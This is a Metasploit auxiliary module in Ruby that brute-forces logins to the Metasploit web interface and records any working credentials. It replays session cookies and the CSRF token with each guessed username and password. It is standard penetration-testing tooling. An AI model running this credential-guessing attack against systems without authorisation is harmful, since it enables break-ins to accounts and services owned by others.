Path: blob/master/modules/auxiliary/scanner/msf/msf_web_login.rb
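##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute

  include Msf::Auxiliary::Scanner

  # Hidden form field carrying the CSRF (authenticity) token on the login page.
  # The value class excludes '"' so the capture cannot run past the closing
  # quote when the whole form is rendered on a single line.
  AUTH_TOKEN_RE = /<input name="authenticity_token" type="hidden" value="([^"]*)"/

  def initialize
    super(
      'Name' => 'Metasploit Web Interface Login Utility',
      'Description' => %{
        This module simply attempts to login to a Metasploit
        web interface using a specific user/pass.
      },
      'Author' => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],
      'License' => MSF_LICENSE,
      'DefaultOptions' => { 'SSL' => true }
    )

    register_options(
      [
        Opt::RPORT(3790),
        OptString.new('URILOGIN', [true, "URI for Metasploit Web login. Default is /login", "/login"]),
        OptString.new('URIGUESS', [true, "URI for Metasploit Web login. Default is /user_sessions", "/user_sessions"]),
        OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]),
      ])

    register_autofilter_ports([55553])
  end

  # Fetch the login page once and check it looks like the Metasploit web UI
  # before any credentials are spent on the host.
  #
  # @param ip [String] host being scanned (supplied by the Scanner mixin)
  # @return [void]
  def run_host(ip)
    begin
      res = send_request_cgi({
        'uri' => datastore['URILOGIN'],
        'method' => 'GET'
      }, 25)
      http_fingerprint({ :response => res })
    rescue ::Rex::ConnectionError => e
      vprint_error("#{datastore['URILOGIN']} - #{e}")
      return
    end

    if res.nil?
      vprint_error(" #{datastore['URILOGIN']} - No response")
      return
    end
    # The login page is either served directly (200) or reached via a redirect (302).
    unless [200, 302].include?(res.code)
      vprint_error("Expected 200 HTTP code - not msf web? Got: #{res.code}")
      return
    end
    if res.body !~ /<title>Metasploit<\/title>/
      vprint_error("Expected metasploit page - not msf web interface? #{res.body}")
      return
    end

    each_user_pass do |user, pass|
      do_login(user, pass)
    end
  end

  # Try a single username/password pair against the web login form.
  #
  # The login page is fetched first because the POST must replay the session
  # cookies and the authenticity token the server handed out with the form.
  #
  # @param user [String] username to try
  # @param pass [String] password to try
  # @return [Symbol] AuthBrute status: :next_user on success, :skip_pass when the
  #   pair is rejected, :abort when the target cannot be used further
  def do_login(user='msf', pass='msf')
    vprint_status(" - Trying username:'#{user}' with password:'#{pass}'")
    begin
      res = send_request_cgi({
        'uri' => datastore['URILOGIN'],
        'method' => 'GET'
      }, 25)

      unless res && res.code == 200 && !res.get_cookies.empty?
        print_error("Failed to get login cookies, aborting")
        return :abort
      end

      token, uisession = parse_session_cookies(res.get_cookies)
      atoken = extract_authenticity_token(res.body)
      if atoken.nil?
        print_error("No auth token found")
        return :abort
      end

      res = send_request_cgi(
        {
          'uri' => datastore['URIGUESS'],
          'method' => 'POST',
          'cookie' => "token=#{token}; _ui_session=#{uisession}",
          'vars_post' =>
          {
            'commit' => 'Sign in',
            'utf8' => "\xE2\x9C\x93",
            'authenticity_token' => atoken,
            'user_session[username]' => user,
            'user_session[password]' => pass
          }
        }, 25)

      # A nil response must not be dereferenced when building the failure
      # message (the old code read res.code unconditionally here).
      if res.nil? || res.code != 302
        code = res ? res.code : 'no response'
        vprint_error("FAILED LOGIN. '#{user}' : '#{pass}' with code #{code}")
        return :skip_pass
      end
      # Rejected credentials are redirected back to the login page.
      if res.headers['Location'] =~ /\/login/
        vprint_error("FAILED LOGIN. '#{user}' : '#{pass}' with wrong redirect")
        return :skip_pass
      end

      print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
      report_cred(
        ip: datastore['RHOST'],
        port: datastore['RPORT'],
        service_name: 'msf-web',
        user: user,
        password: pass,
        proof: res.headers['Location']
      )
      return :next_user
    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
      print_error("HTTP Connection Failed, Aborting")
      return :abort
    end
  end

  # Record a working login in the database as a credential plus a login row
  # bound to the msf-web service.
  #
  # @param opts [Hash] :ip, :port, :service_name, :user, :password, :proof
  # @return [Object] result of create_credential_login
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: Time.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  private

  # Pull the 'token' and '_ui_session' values out of the raw cookie string.
  #
  # Fragments are separated on ';' and ',' as before, but each fragment is
  # split on the first '=' only, so a value that itself contains '=' (base64
  # padding, for instance) is no longer truncated.
  #
  # @param cookies [String] raw cookie string from Rex's get_cookies
  # @return [Array(String, String)] [token, ui_session]; '' for a missing cookie
  def parse_session_cookies(cookies)
    token = ''
    uisession = ''
    cookies.split(';').flat_map { |chunk| chunk.split(',') }.each do |fragment|
      name, value = fragment.split('=', 2)
      # Attribute-only fragments such as 'HttpOnly' carry no value.
      next if value.nil?
      name = name.to_s.strip
      if name =~ /token/
        token = value
      elsif name =~ /_ui_session/
        uisession = value
      end
    end
    [token, uisession]
  end

  # Extract the authenticity token from the login form HTML.
  #
  # @param body [String, nil] HTML of the login page
  # @return [String, nil] token value, or nil when the hidden field is absent
  def extract_authenticity_token(body)
    return nil if body.nil?
    match = AUTH_TOKEN_RE.match(body)
    match && match[1]
  end
end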